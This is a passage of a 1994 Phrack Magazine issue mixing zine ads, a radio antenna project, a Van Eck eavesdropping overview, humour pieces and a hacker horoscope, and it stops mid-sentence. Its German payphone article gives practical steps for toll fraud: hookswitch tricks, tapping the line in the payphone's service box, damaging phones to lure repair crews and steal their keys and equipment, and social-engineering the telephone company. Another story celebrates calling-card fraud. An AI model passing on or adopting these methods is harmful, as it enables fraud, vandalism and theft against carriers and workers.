Firewalls FAQ : ``A firewall is any one of several ways of protecting one network from another untrusted network. The actual mechanism whereby this is accomplished varies widely, but in principle, the firewall can be thought of as a pair of mechanisms: one which exists to block traffic, and the other which exists to permit traffic. Some firewalls place a greater emphasis on blocking traffic, while others emphasize permitting traffic.'' (**) This would be a great place to start a long and boring discussion about different types of hackers and how security (including firewalls) affect them. But... I don't think so. (***) ftp://research.att.com:/dist/internet_security/firewall.book also contains, in text and PostScript, the list of parts, chapters and sections in the book, and the Preface section. For that reason, those sections weren't printed here. All the papers mentioned in this review can be found on that FTP site. ------------------------------------------------------------------------------ Announcing Bellcore's Electronic Information Catalog for Industry Clients... To access the online catalog: telnet info.bellcore.com login: cat10 or dial 201-829-2005 annex: telnet info login: cat10 [Order up some E911 Documents Online!] ------------------------------------------------------------------------------ TTTTT H H EEEEE T H H E T HHHHH EEEEE T H H E T H H EEEEE CCC U U RRRR M M U U DDDD GGG EEEEE OOO N N C C U U R R MM MM U U D D G G E O O NN N C U U RRRR M M M U U D D G EEEEE O O N N N C C U U R R M M U U D D G GG E O O N NN CCC UUU R R M M UUU DDDD GGG EEEEE OOO N N Bill Clinton promised good health care coverage for everyone. Bill Clinton promised jobs programs for the unemployed. Bill Clinton promised that everyone who wanted could serve in the military. Bill Clinton promised a lot. So does the Curmudgeon. But unlike Bill Clinton, we'll deliver... For only $10 a year (12 issues) you'll get alternative music reviews and interviews, political reporting, anti-establishment features and commentary, short fiction, movie reviews, book reviews, and humor. Learn the truth about the Gulf War, Clipper, and the Selective Service System. Read everything you wanted to know about bands like the Offspring, R.E.M., the Cure, Porno for Pyros, Pearl Jam, Dead Can Dance, Rhino Humpers, and Nine Inch Nails. Become indoctrinated by commentary that just might change the way you think about some things. Subscribe to the Curmudgeon on paper for $10 or electronically for free. Electronic subscribers don't get everything that paying subscribers do like photos, spoof ads, and some articles. Paper: send $10 check or money order to the Curmudgeon 4505 University Way N.E. Box 555 Seattle, Washington 98105 Electronic: send a request to rodneyl@u.washington.edu ------------------------------------------------------------------------------ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% % The Journal Of American Underground Computing - ISSN 1074-3111 % %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Computing - Communications - Politics - Security - Technology - Humor -Underground - Editorials - Reviews - News - Other Really Cool Stuff- Published Quarterly/Semi-Quarterly By Fennec Information Systems This is one of the more popular new electronic publications. To get your free subscription, please see the addresses below. Don't miss out on this newsworthy publication. We are getting hundreds of new subscriptions a month. This quarterly was promoted in Phrack Magazine. If you don't subscribe, you're only cheating yourself. Have a great day...and a similar tomorrow * Coming soon * A Windows-based help file containing all of the issues of the magazine as well as extensive bio's of all of the editors. Subscription Requests: sub@fennec.com Comments to Editors : editors@fennec.com Back issues via Ftp : etext.archive.umich.edu /pub/Zines/JAUC fc.net /pub/tjoauc Submissions : submit@fennec.com Finger info : dfox@fc.net and kahuna@fc.net ------------------------------------------------------------------------------ Make the best out of your European pay telephone by Onkel Dittmeyer, onkeld@ponton.hanse.de ----------------------------------------------------- Okay guys and girls, let's come to a topic old like the creation but yet never revealed. European, or, to be more exact, German pay phone technology. Huh-huh. There are several models, round ones, rectangular ones, spiffy looking ones, dull looking ones, and they all have one thing in common: If they are something, they are not what the American reader might think of a public pay telephone, unlike it's U.S. brothers, the German payphones always operate off a regular customer-style telephone line, and therefore they're basically all COCOTS, which makes it a lot easier to screw around with them. Let's get on with the models here. You are dealing with two classes; coin-op ones and card-op ones. All of them are made by Siemens and TELEKOM. The coin-op ones are currently in the process of becoming extinct while being replaced by the new card-op's, and rather dull. Lacking all comfort, they just have a regular 3x4 keypad, and they emit a cuckoo tone if you receive a call. The only way to tamper with these is pure physical violence, which is still easier than in the U.S.; these babies are no fortresses at all. Well, while the coin-op models just offer you the opportunity of ripping off their money by physically forcing them open, there is a lot more fun involved if you're dealing with the card babies. They are really spiffy looking, and I mean extraordinary spiffy. Still nothing compared to the AT&T VideoFoNeZ, but still really spiffy. The 2-line pixel-oriented LCD readout displays the pure K-Radness of it's inventors. Therefore it is equipped with a 4x4 keypad that has a lot of (undocumented) features like switching the mother into touch-tone mode, redial, display block etc. Plus, you can toggle the readout between German, English, and French. There are rumors that you can put it into Mandarin as well, but that has not been confirmed yet. Let's get ahead. Since all payphones are operating on a regular line, you can call them up. Most of them have a sign reading their number, some don't. For those who don't, there is no way for you to figure out their number, since they did not invent ANI yet over here in the country famous for its good beer and yodel chants. Well, try it. I know you thought about it. Call it collect. Dialing 010 will drop you to a long-distance operator, just in case you didn't know. He will connect the call, since there is no database with all the payphone numbers, the payphone will ring, you pick up, the operator will hear the cuckoo tone, and tell you to fuck off. Bad luck, eh? This would not be Phrack if there would be no way to screw it. If you examine the hook switch on it closely, you will figure out that, if you press it down real slow and carefully, there are two levels at whom it provokes a function; the first will make the phone hang up the line, the second one to reset itself. Let me make this a little clearer in your mind. ----- <--- totally released | | | <--- hang up line press to this level --> | | <--- reset | ----- <--- totally hung up Involves a little practice, though. Just try it. Dial a number it will let you dial, like 0130, then it will just sit there and wait for you to dial the rest of the number. Start pressing down the hookswitch really slow till the line clicks away into suspense, if you release it again it will return you to the dial tone and you are now able to call numbers you aren't supposed to call, like 010 (if you don't have a card, don't have one, that's not graceful), or 001-212-456-1111. Problem is, the moment the other party picks up, the phone will receive a charge subtraction tone, which is a 16kHz buzz that will tell the payphone to rip the first charge unit, 30 pfennigs, off your card, and if you don't have one inserted and the phone fails to collect it, it will go on and reset itself disconnecting the line. Bad luck. Still good enough to harass your favorite fellas for free, but not exactly what we're looking for, right? Try this one. Push the hook lever to the suspension point, and let it sit there for a while, you will have to release it a bit every 5 seconds or so, or the phone will reset anyway. If you receive a call while doing this, a buzz will appear on the line. Upon that buzz, let the lever go and you'll be connected, and the cuckoo tone will be shut up! So if you want to receive a collect call, this is how you do it. Tell the operator you accept the charges, and talk away. You can use this method overseas, too: Just tell your buddy in the states to call Germany Direct (800-292-0049) and make a collect call to you waiting in the payphone, and you save a cool $1.17 a minute doing that. So much for the kids that just want to have some cheap fun, and on with the rest. Wasting so much time in that rotten payphone, you probably noticed the little black box beneath the phone. During my, erm, research I found out that this box contains some fuses, a standard Euro 220V power connector, and a TAE-F standard phone connector. Completing the fun is the fact that it's extremely easy to pry it open. The TAE-F plug is also bypassing the phone and the charge collection circuits, so you can just use it like your jack at home. Bring a crowbar and your laptop, or your Pentium tower, power it over the payphone and plug your Dual into the jack. This way you can even run a board from a payphone, and people can download the latest WaReZzzZzz right from the booth. It's preferable to obtain a key for the lock of the box, just do some malicious damage to it (yes, let the animal take control), and call Telekom Repairs at 1171 and they will come and fix it. Since they always leave their cars unlocked, or at least for the ones I ran across, you can either take the whole car or all their k-rad equipment, manuals, keys, and even their lunch box. But we're shooting off topic here. The keys are usually general keys, means they fit on all payphones in your area. There should also be a nationwide master key, but the German Minister of Tele- communications is probably keeping that one in his desk drawer. The chargecards for the card-op ones appear to have a little chip on them, where each charge unit is being deducted, and since no-one could figure out how it works, or how to refill the cards or make a fake one, but a lot of German phreaks are busy trying to figure that out. A good approach is also social-engineering Telekom so they turn off the charge deduction signal (which doesn't mean the call are free, but the buzz is just not transmitted any more) so the phone doesn't receive a signal to charge you any money no matter where you call. The problem with this method is that the world will spread in the neighborhood that there is a payphone where you can call for free, and therefore it will be so crowded that you can't use it, and the phone pals will catch up fast. It's fun though, I tried it, and I still get free drinks at the local pub for doing it. Another k-rad feature on them is the built-in modem that they use to get their software. On a fatal error condition they appear to dial a telecom number and download the latest software just how their ROM commands them to do. We will shortly take a phone, install it some- where else and figure out where it calls, what the protocol is and what else is being transmitted, but that will probably be in another Phrack. If you found out anything that might be of interest, you are welcome to mail it to onkeld@ponton.hanse.de using the public key beneath. Unencrypted mail will be killed since ponton.hanse.de is run by a paranoid bitch that reads all traffic just for the hell of it, and I don't want the phedzZz to come and beat me over the head with a frozen chunk o' meat or worse. Stay alert, watch out and have fun... -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.3a mQCNAize9DEAAAEEAKOb5ebKYg6cAxaiVT/H5JhCqgNNDHpkBwFMNuQW2nGnLMvg Q0woIxrM5ltnnuCBJGrGNskt3IMXsav6+YFjG6IA8YRHgvWEwYrTeW2tniS7/dXY fqCCSzTxJ9TtLAiMDBgJFzOIUj3025zp7rVvKThqRghLx4cRDVBISel/bMSZAAUR tChPbmtlbCBEaXR0bWV5ZXIgPG9ua2VsZEBwb250b24uaGFuc2UuZGU+ =b5ar -----END PGP PUBLIC KEY BLOCK----- ------------------------------------------------------------------------------ _ _ _ _ ((___)) INFORMATION IS JUNK MAIL ((___)) [ x x ] [ x x ] \ / cDc communications \ / (' ') -cDc- CULT OF THE DEAD COW -cDc- (' ') (U) (U) deal with it, presents unto you 10 phat t-files, deal with it, S U C K E R fresh for July 1994: S U C K E R New gNu NEW gnU new GnU nEW gNu neW gnu nEw GNU releases for July, 1994: _________________________________/Text Files\_________________________________ 261: "Interview with Greta Shred" by Reid Fleming. Reid conducts an in-depth interview with the editor of the popular 'zine, _Mudflap_. 262: "_Beverly Hills 90210_ as Nostalgia Television" by Crystal Kile. Paper presented for the 1993 National Popular Culture Association meeting in New Orleans. 263: "What Color Is the Sky in Your World?" by Tequila Willy. Here's your homework, done right for you by T. "Super-Brain" Willy. 264: "Chicken Hawk" by Mark E. Dassad. Oh boy. Here's a new watermark low level of depravity and sickness. If you don't know what a "chicken hawk" is already, read the story and then you'll understand. 265: "Eye-r0N-EE" by Swamp Ratte'. This one's interesting 'cause only about half-a-dozen or so lines in it are original. The rest was entirely stuck together from misc. files on my hard drive at the time. Some art guy could say it's a buncha post-this&that, eh? Yep. 266: "Interview with Barbie" by Clench. Barbie's got her guard up. Clench goes after her with his rope-a-dope interview style. Rope-a-dope, rope-a-dope. This is a boxing reference to a technique mastered by The Greatest of All Time, Muhamed Ali. 267: "About a Boy" by Franken Gibe. Mr. Gibe ponders a stolen photograph. Tiny bunnies run about, unhindered, to find their own fate. 268: "Mall Death" by Snarfblat. Story about a Dumb Girl[TM]. Are you surprised? 269: "Prophile: Future History" by THE NIGHTSTALKER. It's the future, things are different, but the Master Hacker Dude lives on. 270: "Time out for Pop" by Malcolm D. Moore. Sad account of a hopless-pop. __________________________________/cDc Gnuz\__________________________________ "And that no man might buy or sell, save he that had the mark, or the name of the Cow, or the number of his name. Here is wisdom. Let him that hath understanding count the number of the Cow: for it is the number of a man; and his number is eight billion threescore and seven million nine hundred fourty- four thousand three hundred threescore and two. So it is written." -Omega Yowsah, yowsah, yowsah. JULY once again, the super-hooray month which marks cDc's 8th year of existence. Outlasting everyone to completely rule and dominate all of cyberspace, blah blah blah. Yeah, think a special thought about cDc's significance in YOUR life the next time you go potty. Name your firstborn child after me, and we'll call it karmicly even, pal. My name is Leroy. We're always taking t-file submissions, so if you've got a file and want to really get it out there, there's no better way than with cDc. Upload text to The Polka AE, to sratte@phantom.com, or send disks or hardcopy to the cDc post office box in Lubbock, TX. No song lyrics and bad poetry please; we'll leave that to the no-class-havin', bottom-feeder e-shoveling orgs. out there. News item of the month, as found by Count Zero: "ROTTING PIG FOUND IN DITCH VERDEN, OKLAHOMA - Responding to a tip from an employee, Verden farmer Bill McVey found a rotting pig in a ditch two miles north of town. Farmer McVey reported the pig to the authorities, because you cannot, legally, just leave a dead pig in a ditch. You must dispose of your deceased livestock properly. There are companies that will take care of this for you. As for proper disposal of large dead animals, McVey contracts with Used Cow Dealer." "...and the rivers ran red with the bl00d of the Damned and the Deleted..." -Dem0nSeed S. Ratte' cDc/Editor and P|-|Ear13zz |_3@DeRrr "We're into t-files for the groupies and money." Middle finger for all. Write to: cDc communications, P.O. Box 53011, Lubbock, TX 79453. Internet: sratte@phantom.com. ALL cDc FILES LEECHABLE FROM FTP.EFF.ORG IN pub/Publications/CuD/CDC. _____________________________________________________________________________ cDc Global Domination Update #16-by Swamp Ratte'-"Hyperbole is our business" Copyright (c) 1994 cDc communications. All Rights Reserved. ------------------------------------------------------------------------------ ===[ Radio Modification Project ]===========================================> Tuning in to Lower Frequency Signals June 26, 1994 ====================================================[ By: Grendel / 905 ]===> The lower frequency regions of the radio spectrum are often ignored by ham'ers, pirates, and DX'ers alike due to the relatively little known ways of tuning in. The following article will detail how to construct a simple-made antenna to tune in to the LF's and show how to adjust an amateur band type radio to receive the desired signals. ___________ \ / \/: \/ / . \ \_______/he lower frequency spectrum has been made to include the very low frequency ("VLF" 2 kHz to 30 kHz) band and a small part of the medium frequency ("MF" 300 - 500 kHz) band. For our purposes, a suitable receiver must be able to cover the 2 kHz to 500 kHz range as well as being calibrated at 10 kHz intervals (standard). The receiver must also be capable of covering AM and CW broadcasts. For best capabilities, the receiver should also be able to cover LSB ("lower side band") and USB ("upper side band"). The Receiving System `'`'`'`'`'`'`'`'`'`' The receiver I use consists of a standard amateur HF ("High Frequency") band receiver adjusted between the 3,500 and 4,000 kHz bands. This causes the receiver to act as a tuneable IF ("Intermediate Frequency") and also as demodulator. You will also require a wideband LF ("Low Frequency") converter which includes a 3,500 kHz crystal oscillator. See Fig. 1: .==[ Fig 1. Block Diagram ]============================. | _____ | | \ANT/ | | \./ crystal | | | ______|______ ____________ | | `-----| 2 - 500 kHz | | 3-4000 kHz | | | | Converter* |--~--| IF Receiver|---OUTPUT | | .-----|_____________| |____________| | | | | | GND | |______________________________________________________| *The converter is a circuit board type 80D/L-101/PCB available from L.F. Engineering Co, 17 Jeffry Road, East Haven CT, 06513 for $43 US including S & H.One may be constructed to work with your receiver (but at a higher price no doubt). Phono jack plugs and sockets are used for the interconnections throughout the receiving system and the converter and receiver (~) are connected with RG58 coax cable of no greater length than 4 ft. When tuning, the station frequency is measured by deducting 3,500 kHz from the scale on the main receiver (ie. 340 kHz = 3,840 kHz on the main receiver, 120 = 3,620 kHz, 95 = 3,595 kHz, etc.) The Ferrite End-fed Antenna `'`'`'`'`'`'`'`'`'`'`'`'`'` This is a small antenna designed to tune between 95 kHz and 500 kHz. It consists of a coil wound around a ferrite rod, with a 4 ft. lead. Materials: o 7 7/8" x 3/8" ferrite rod o 5" 24 SWG double cotton covered copper wire o 2 PLASTIC coated terry clips o a wood or plastic base (8 1/2" x .8" x .5") o 2 standard, two-gang 500 pF tuning capacitors o a plastic plate (preferably 2" high) ------------------------------------------------------------------------------ -- A Few Things on Van Eck's Method of Eavesdroping -- Opticon the Disassembled - UPi Dr Wim Van Eck, was the one who developed the anonymous method for eavesdroping computers ( and, apparently, not only ) from distance, in the laboratories of Neher, Holland. This method is based on the fact that monitors do transmit electromagnetic radiations. As a device, it is not too complex and it can be constructed from an experienced electronics phreak. It uses a simple-direction antenna which grabs monitor signals from about 800 meters away. Simplified schematics are available from Consumertronics. TEMPEST stands for Transient ElectroMagnetic Pulse Emanation STandard. It concerns the quantity of electromagnetic radiations from monitors and televisions, although they can also be detected on keyboards, wires, printers and central units. There are some security levels in which such radiations are supposed to be untraceable by Van Eck systems. Those security levels or standards, are described thoroughly in a technical exposition called NACSIM 5100A, which has been characterized by NSA classified. Variations of the voltage of the electrical current, cause electromagnetic pulses in the form of radio waves. In cathode ray tube ( C.R.T. ) devices, such as televisions and monitors, a source of electrons scans the internal surface and activates phosphore. Whether or not the scanning is interlaced or non-interlaced, most monitors transmit frequencies varying from 50 to 75 Mhz per second. They also transmit harmonic frequencies, multiplies of the basic frequencies; for example a transmitter with signal of 10 Mhz per second will also transmit waves of 20, 30, 40 etc. Mhz. Those signals are weaker because the transmiter itself effaces them. Such variations in the voltage is what the Van Eck system receives and analyzes. There are ways to prevent or make it harder for someone to monitor your monitor. Obviously you cannot place your computer system underground and cover it with a Faraday cage or a copper shield ( If your case is already that, then you know more about Van Eck than I do ). What else ? (1) Certain computers, such as Wang's, prevent such divulges; give preference to them. (2) Place your monitor into a grounded metal box, 1.5 cm thick. (3) Trace your tracer(s). They gonna panic. (4) Increase of the brightness and lowering of the contrast reduces TEMPEST's power. Metal objects, like bookshelves, around the room, will also help a little bit. (5) Make sure that two or more monitors are transmitting at the same frequency and let them operate simultaneously; this will confuse Van Eck systems. (6) Buy or make on your own, a device which will transmit noise at your monitor's frequency. (7) Act naturally. That is: (a) Call IRC, join #hack and never mumble a single word. (b) Read only best selling books. (c) Watch television at least 8 hours a day. (d) Forget altruism; there is only you, yourself and your dick/crack. (8) Turn the monitor off. ------------------------------------------------------------------------------ -Almost Busted- By: Deathstar It all started one week in the last month of summer. Only my brother and I were at the house for the whole week, so I did whatever I wanted. Every night, I would phreak all night long. I would be either at a payphone using AT&Tz, or at home sitting on a conference. I would be on the phone till at least four or five in the morning. But one night, my luck was running thin, and I almost phreaked for the last time. I was at a payphone, using cards. I had been there since around twelve midnight.. The payphone was in a shopping center with a supermarket and a few other stores. Most every thing closed at eleven.. Except for the nearby gas station. Anyway, I was on the phone with only one person that night. I knew the card would be dead by the end of the night so I went ahead and called him on both of his lines with both of the payphones in the complex with the same card. I had talked for hours. It started to get misty and hard to see. Then, I noticed a car of some kind pulling into the parking lot. I couldn't tell what kind of car it was, because it was so dark. The car started pulling up to me, and when it was around twenty feet away I realized it was a police car. They got on the loudspeaker and yelled "Stay where you are!". I dropped the phone and ran like hell past the supermarket to the edge of the complex. I went down a bike path into a neighborhood of townhouses. Running across the grass, I slipped and fell about two or three times. I knew they were following me, so I had to hide. I ran to the area around the back of the supermarket into a forest. I smacked right into a fence and fell on the ground. I did not see the fence since it was so dark. Crawling a few feet, I laid down and tried to cover my body with some leaves and dirt to hide. I was wearing an orange shirt and white shorts. I laid as still as I could, covered in dirt and leaves. I could hear the police nearby. They had flashlights and were walking through the forest looking for me. I knew I would get busted. I tried as hard as I could to keep from shaking in fear. I lay there for around thirty minutes. Bugs were crawling around on my legs biting me. I was itching all over. I couldn't give up though, because if they caught me I knew that would be the end of my phreaking career. I was trying to check if they were still looking for me, because I could not hear them. Just as I was about to make a run for it, thinking they were gone I heard a police radio. I sat tight again. For another hour, I lay there until finally I was sure they were gone. I got up and started to run. I made my way through the neighborhood to my house. Finally I got home. It was around five thirty a.m. I was filthy. The first thing I did was call the person I was talking to on the payphone and tell him what happened. Then, I changed clothes and cleaned myself up. I checked my vmb to find that a conference was up. I called it, and told my story to everyone on. I thought that was the end of my confrontation with the police, but I was wrong. The next day I had some people over at my house. Two or Three good friends. One of them said that there was a fugitive loose in our town. We were bored so we went out in the neighborhood to walk around and waste time. Hardly anyone was outside, and police cars were going around everywhere. One guy did leave his house but he brought a baseball bat with him. We thought it was funny. Anyway, we soon got bored and went back home. Watching tv, we turned to the news. They had a Report about the Fugitive. We watched. It showed a picture of the shopping center I was at. They said "One suspect was spotted at this shopping center last night at around four thirty in the morning. The officer is around ninety five percent sure that the suspect was the fugitive. He was wearing a orange shirt and white shorts, and ran when approached." I then freaked out. They were searching my neighborhood for a fugitive that didn't exist! I called back the guy I was talking to the night before and told him, and then told everyone that was on the conference the night before. It ended up that the fugitives never even entered our state. They were caught a week later around thirty miles from the prison they escaped from. Now I am known by two nicknames. "NatureBoy" because everyone says I communed with nature for a hour and a half hiding from the police, and "The Fugitive" for obvious reasons. Anywayz, That's how I was almost busted.. -DS ------------------------------------------------------------------------------ The following is a *true* story. It amused the hell out of me while it was happening. I hope it isn't one of those "had to be there" things. Copyright 1994 Captain Sarcastic, all rights reserved. On my way home from the second job I've taken for the extra holiday ca$h I need, I stopped at Taco Bell for a quick bite to eat. In my billfold is a $50 bill and a $2 bill. That is all of the cash I have on my person. I figure that with a $2 bill, I can get something to eat and not have to worry about people getting pissed at me. ME: "Hi, I'd like one seven layer burrito please, to go." IT: "Is that it?" ME: "Yep." IT: "That'll be $1.04, eat here?" ME: "No, it's *to* *go*." [I hate effort duplication.] At his point I open my billfold and hand him the $2 bill. He looks at it kind of funny and IT: "Uh, hang on a sec, I'll be right back." He goes to talk to his manager, who is still within earshot. The following conversation occurs between the two of them. IT: "Hey, you ever see a $2 bill?" MG: "No. A what?" IT: "A $2 bill. This guy just gave it to me." MG: "Ask for something else, THERE'S NO SUCH THING AS A $2 BILL." [my emp] IT: "Yeah, thought so." He comes back to me and says IT: "We don't take these. Do you have anything else?" ME: "Just this fifty. You don't take $2 bills? Why?" IT: "I don't know." ME: "See here where it says legal tender?" IT: "Yeah." ME: "So, shouldn't you take it?" IT: "Well, hang on a sec." He goes back to his manager who is watching me like I'm going to shoplift, and IT: "He says I have to take it." MG: "Doesn't he have anything else?" IT: "Yeah, a fifty. I'll get it and you can open the safe and get change." MG: "I'M NOT OPENING THE SAFE WITH HIM IN HERE." [my emp] IT: "What should I do?" MG: "Tell him to come back later when he has REAL money." IT: "I can't tell him that, you tell him." MG: "Just tell him." IT: "No way, this is weird, I'm going in back." The manager approaches me and says MG: "Sorry, we don't take big bills this time of night." [it was 8pm and this particular Taco Bell is in a well lighted indoor mall with 100 other stores.] ME: "Well, here's a two." MG: "We don't take *those* either." ME: "Why the hell not?" MG: "I think you *know* why." ME: "No really, tell me, why?" MG: "Please leave before I call mall security." ME: "Excuse me?" MG: "Please leave before I call mall security." ME: "What the hell for?" MG: "Please, sir." ME: "Uh, go ahead, call them." MG: "Would you please just leave?" ME: "No." MG: "Fine, have it your way then." ME: "No, that's Burger King, isn't it?" At this point he BACKS away from me and calls mall security on the phone around the corner. I have two people STARING at me from the dining area, and I begin laughing out loud, just for effect. A few minutes later this 45 year oldish guy comes in and says [at the other end of counter, in a whisper] SG: "Yeah, Mike, what's up?" MG: "This guy is trying to give me some [pause] funny money." SG: "Really? What?" MG: "Get this, a *two* dollar bill." SG: "Why would a guy fake a $2 bill?" [incredulous] MG: "I don't know? He's kinda weird. Says the only other thing he has is a fifty." SG: "So, the fifty's fake?" MG: "NO, the $2 is." SG: "Why would he fake a $2 bill?" MG: "I don't know. Can you talk to him, and get him out of here?" SG: "Yeah..." Security guard walks over to me and says SG: "Mike here tells me you have some fake bills you're trying to use." ME: "Uh, no." SG: "Lemme see 'em." ME: "Why?" SG: "Do you want me to get the cops in here?" At this point I was ready to say, "SURE, PLEASE," but I wanted to eat, so I said ME: "I'm just trying to buy a burrito and pay for it with this $2 bill." I put the bill up near his face, and he flinches like I was taking a swing at him. He takes the bill, turns it over a few times in his hands, and says SG: "Mike, what's wrong with this bill?" MG: "It's fake." SG: "It doesn't look fake to me." MG: "But it's a **$2** bill." SG: "Yeah?" MG: "Well, there's no such thing, is there?" The security guard and I both looked at him like he was an idiot, and it dawned on the guy that he had no clue. My burrito was free and he threw in a small drink and those cinnamon things, too. Makes me want to get a whole stack of $2 bills just to see what happens when I try to buy stuff. If I got the right group of people, I could probably end up in jail. At least you get free food. ------------------------------------------------------------------------------ ==Phrack Magazine== Volume Five, Issue Forty-Six, File 4 of 28 // // /\ // ==== // // //\\ // ==== ==== // // \\/ ==== /\ // // \\ // /=== ==== //\\ // // // // \=\ ==== // \\/ \\ // // ===/ ==== PART II ------------------------------------------------------------------------------ The official Legion of Doom t-shirts are still available. Join the net.luminaries world-wide in owning one of these amazing shirts. Impress members of the opposite sex, increase your IQ, annoy system administrators, get raided by the government and lose your wardrobe! Can a t-shirt really do all this? Of course it can! -------------------------------------------------------------------------- "THE HACKER WAR -- LOD vs MOD" This t-shirt chronicles the infamous "Hacker War" between rival groups The Legion of Doom and The Masters of Destruction. The front of the shirt displays a flight map of the various battle-sites hit by MOD and tracked by LOD. The back of the shirt has a detailed timeline of the key dates in the conflict, and a rather ironic quote from an MOD member. (For a limited time, the original is back!) "LEGION OF DOOM -- INTERNET WORLD TOUR" The front of this classic shirt displays "Legion of Doom Internet World Tour" as well as a sword and telephone intersecting the planet earth, skull-and-crossbones style. The back displays the words "Hacking for Jesus" as well as a substantial list of "tour-stops" (internet sites) and a quote from Aleister Crowley. -------------------------------------------------------------------------- All t-shirts are sized XL, and are 100% cotton. Cost is $15.00 (US) per shirt. International orders add $5.00 per shirt for postage. Send checks or money orders. Please, no credit cards, even if it's really your card. Name: __________________________________________________ Address: __________________________________________________ City, State, Zip: __________________________________________ I want ____ "Hacker War" shirt(s) I want ____ "Internet World Tour" shirt(s) Enclosed is $______ for the total cost. Mail to: Chris Goggans 603 W. 13th #1A-278 Austin, TX 78701 These T-shirts are sold only as a novelty items, and are in no way attempting to glorify computer crime. ------------------------------------------------------------------------------ introducing... The PHRACK Horoscope, Summer 1994 Foreseen in long nights of nocturnal lubrication by Onkel Dittmeyer --- Do you believe in the stars? Many do, some don't. In fact, the stars can tell you a whole lot about the future. That's bullshit? You don't believe it? Good. Be doomed. See you in hell. Here's the official PHRACK horoscope for all eleet hackerz for the summer of 1994. You can use this chart to find out your zodiac sign by your DOB. Aquarius.....01/20 - 02/18 Leo..........07/23 - 08/22 Pisces.......02/19 - 03/20 Virgo........08/23 - 09/22 Aries........03/21 - 04/19 Libra........09/23 - 10/22 Taurus.......04/20 - 05/20 Scorpio......10/23 - 11/21 Gemini.......05/21 - 06/20 Sagittarius..11/22 - 12/21 Cancer.......06/21 - 07/22 Capricorn....12/22 - 01/19 --- oOo This summer's best combinations oOo YOU LOVE BS VICTIM H0T WAREZ ============================================================== Aquarius Libra Leo Sagittarius Pisces Sagittarius Aquarius Cancer Aries Aries Cancer Capricorn Taurus Gemini Pisces Taurus Gemini Cancer Aries Scorpio Cancer Leo Virgo Gemini Leo Scorpio Gemini Leo Virgo Capricorn Sagittarius Libra Libra Virgo Libra Virgo Scorpio Pisces Capricorn Pisces Sagittarius Aquarius Scorpio Aquarius Capricorn Taurus Taurus Aries ============================================================== --- And Now... The 3l33t And Official PHRACK Summer 1994 Horoscope! Aries [March 21st - April 19th] There is a pot full of k0DeZ at the end of the rainbow for you. Try to channel all your ambition on finding it, hint: you won't find it in /bin/gif/kitchen.gear. Warning: Risk of bust between August 5th and August 10th! Luck [oooo.] - Wealth [oo...] - Bust risk [ooo..] - Love [o....] Taurus [April 20th - May 20th] PhedZzZz are lurking behind Saturn, obscured behind one of the rings. Be sure to *67 all your calls, and you'll be fine. Hint: Don't undertake any interstellar space travel, and avoid big yellow ships. Watch out for SprintNet Security between July 12th and August 1st. Luck [oo...] - Wealth [oo...] - Bust risk [oooo.] - Love [ooo..] Gemini [May 21st - June 20th] There might be a force dragging you into warez boards. Try to resist the attraction, or you might be thrown out of the paradise. Hint: If a stranger with a /ASL connect crosses your way, stay away from him. Warning: Your Dual Standard HST might explode sometime in June. Luck [o....] - Wealth [ooo..] - Bust risk [o....] - Love [oo...] Cancer [June 21st - July 22nd] There are dark forces on your trail. Try to avoid all people wearing suits, don't get in their cars, and don't let them give you shit. Hint: Leave the country as soon if you can, or you won't be able to. Look out for U4EA on IRC in late July, you might get /killed. Luck [o....] - Wealth [oo...] - Bust risk [ooooo] - Love [oo...] Leo [July 23rd - August 22nd] The path of Venus this year tells us that there is love on the way for you. Don't look for it on X-rated ftp sites, it might be out there somewhere. Hint: Try getting out of the house more frequently or you might miss it. Warning: If Monica Weaver comes across your way, break and run! Luck [ooo..] - Wealth [o....] - Bust risk [oo...] - Love [oooo.] Virgo [August 23rd - September 22nd] Pluto tells us that you should stay away from VAXes in the near future. Lunatic force tells us that you might have more luck on Berkeley UNIX. Hint: Try to go beyond cat /etc/passwd. Explore sendmail bugs. Warning: In the first week of October, there is a risk of being ANIed. Luck [oooo.] - Wealth [oo...] - Bust risk [oo...] - Love [o....] Libra [September 23rd - October 22nd] The closer way of Mars around the Sun this year might mean that you will be sued by a telco or a big corporation. The eclipse of Uranus could say that you might have some luck and card a VGA 486 Laptop. Hint: Be careful on the cordless. Watch out for good stuff in dumpsters between July 23rd and July 31st. Luck [oo...] - Wealth [o....] - Bust risk [oooo.] - Love [oo...] Scorpio [October 23rd - November 21st] Sun propulsions say that you should spend more time exploring the innards of credit report systems, but be aware that Saturn reminds you that one local car dealer has his I.D. monitored. Hint: Stay out of #warez Warning: A star called 43-141 might be your doom. Watch out. Luck [ooo..] - Wealth [oooo.] - Bust risk [oo...] - Love [oo...] Sagittarius [November 22nd - December 21st] Cold storms on Pluto suggest that you don't try to play eleet anarchist on one of the upcoming cons. Pluto also sees that there might be a slight chance that you catch a bullet pestering a cop. Hint: Be nice to your relatives. You might get lucky BSing during the third week of August. Luck [o....] - Wealth [oo...] - Bust risk [ooo..] - Love [oo...] Capricorn [December 22nd - January 19th] This summer brings luck to you. Everything you try is about to work out. You might find financial gain in selling k0DeZ to local warez bozos. Hint: Don't try to BS at a number who is a prime number, they will trace your ass and beat you to death with a raw cucumber. Special kick of luck between June 14th and July 2nd. Luck [ooooo] - Wealth [oooo.] - Bust risk [oo...] - Love [ooo..] Aquarius [January 20th - February 18th] The third moon of Saturn suggests to stay in bed over the whole summer, or everything will worsen. Avoid to go to any meetings and cons. Do not try to get up before September 11th. Hint: You can risk to call PRODIGY and have a gR3aT time. Warning: High chance of eavesdroping on your line on August 14th. Luck [.....] - Wealth [o....] - Bust risk [ooooo] - Love [o....] Pisces [February 19th - March 20th] Mars reads a high mobility this summer. You should try to go to a foreign county, maybe visit HEU II. Finances will be OK. Do not go on any buses for that might be your doom. Hint: Don't get a seat near a window, whatever you do. Warning: Avoid 6'8" black guys in Holland, they might go for your ass. Luck [ooo..] - Wealth [ooo..] - Bust risk [o....] - Love [oo...] If your horoscope does not come true, complain to god@heaven.mil. 31337 If it does, you are welcome to report it to onkeld@ponton.hanse.de. 43V3R ------------------------------------------------------------------------------ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: The SenseReal Mission If you are reading this it indicates you have reached a point along your journey that you will have to decide whether you agree with The SenseReal Foundation or whether you think that those who believe and support The SenseReal Foundation are crazy. Your decision to join The SenseReal Foundation on it's mission will 